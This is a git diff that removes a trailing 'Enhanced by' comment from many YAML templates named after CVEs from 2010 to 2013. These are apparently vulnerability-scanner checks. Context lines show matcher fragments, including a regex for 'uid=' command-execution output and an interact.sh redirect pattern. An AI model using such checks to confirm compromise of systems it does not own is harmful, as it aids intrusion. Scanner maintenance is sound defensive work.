e3c071a8cd..408a8b56a7 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/01 + diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 0ff77f186d..3a7dc32eae 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/01 + diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index ea1c13cc91..057fde7c29 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/01 + diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 06ae082cab..79661e5392 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/01 + diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 6bb0aefedd..c13deee018 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index e713e73ade..f84ece952c 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -33,4 +33,4 @@ http: - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# Enhanced by mp on 2022/03/20 + diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 10836dc1c3..26b30799d1 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/16 + diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 49e54d9c55..d3a88597d1 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/17 + diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 84f1ce52d0..2de136f92d 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 42bddbf75e..644a17bfce 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index b1177f4c5c..a154286659 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 0bb506f5e4..c0e5c40e9d 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 8e63181235..5f1721dc38 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 74a976409a..98158ce708 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/16 + diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index b61c4020cb..075d1aefd6 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/16 + diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index d47ae83886..ae5644ad15 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 30c0088048..822ce787d0 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index fd33d9bb37..9ce276862a 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 98b5025213..f6866ef287 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 13f58f84b1..455723dde8 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 4ade6e071e..b0d95ac063 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 97d1baafc7..59e61933fb 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index f94f72e07f..26ef7a59d9 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 70069846bc..1d86cad08e 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 6bde335217..083497dae5 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 3fb3873f6f..c0925fef6a 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 0e1cfe0f70..90b44ebcf9 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 73ea445e68..c3e3166cf8 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 9be32aad82..708ff13a77 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index a2d6fb341e..fc3cf5651d 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 1c3543bc09..f653f061f4 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 9515e012f5..8490c947e0 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 4dba717936..195de06c8c 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 806a5085e4..a848301a4c 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 23e5b0c343..828d8529a5 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 2c20cb936e..ffeb95931d 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 29b967f20d..9abbcaab2a 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 7363d32efd..1c4c61c37b 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index cf5956b121..9a41a9b006 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 9388fb7c47..7c105fe36d 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 984b345c3d..e94a007f7f 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 295183549f..7b7967a7b7 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -35,4 +35,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/05/18 + diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index de2b9e26c1..1bcd226656 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 04c1e027dc..ce8346e990 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index b889847a47..d6346d8180 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index a4abe18768..a8d2a11955 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 + diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 4179ec8c65..9a948a1a33 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 99e7e54e09..22e4cd369a 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 0a54649658..3605c21b8e 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -37,4 +37,4 @@ http: condition: and part: body -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 458b3fc4a9..89a5da2340 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index cf1c05c45d..0b5e2d68b9 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index bed6ae5c84..94813e46e7 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 48c957281c..4497170651 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 26f9ff1a8d..795b315570 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index c92f5945db..96c1b59c76 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 385c2af2dc..f385048751 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -42,4 +42,4 @@ http: words: - text/html -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index c43544de21..c5a05a2458 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index f5dfc9ac7b..33b47d5fad 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 39acdf11e9..97322d27f1 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 2be013652f..7f8dd85e61 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 1c859ca001..907c361ceb 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index d1f70fe39e..c132a5c887 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 56b5b2e088..63d8ceacb0 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 8c3f7f5324..c8e40c170a 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 1a58f04bdc..1d35e689aa 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 81d205fc96..9a1cf39053 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 35e0d96980..5df9cda0e8 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 77fea1453e..121fd7dfe4 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 11d2fd00ce..acf52e1c89 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b68efb4c71..0b404234f0 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 89c151d429..8332fefc0d 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index e34c29b208..32c3c240fb 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 3ea48b96a7..1b0577d44c 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 + diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index a6fd061bdd..b3a487d97f 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -45,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index ff056cc118..1cc10d205f 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index e50e3dd272..020bd8f4e3 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -55,4 +55,4 @@ http: regex: - "/.*/showenv" -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index b85ba0f8ab..458df02341 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 1be5261856..41663dea2b 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index cddc71017b..8c009400df 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 924249dee4..020b0b810c 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 1a8efc1ba4..0c1f8469e3 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index be7bb96ae8..dd2b439f79 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 33488b6041..cc02ec074d 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index edc6ce6601..8f4b40c110 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -35,4 +35,4 @@ http: - "extensions" condition: and -# Enhanced by cs on 2022/02/25 + diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 8b307eafa0..99c03aa82a 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 35c1132f3e..2c54f22371 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index e7324e7981..237cdea2da 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -31,4 +31,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 48fceccf64..a3293f4d45 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -55,4 +55,4 @@ http: regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 66b2335ac3..3487c18285 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 + diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index ecedabb218..2a26edb9ab 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 + diff --git a/http/cves/2013/CVE-2013-3827.yaml 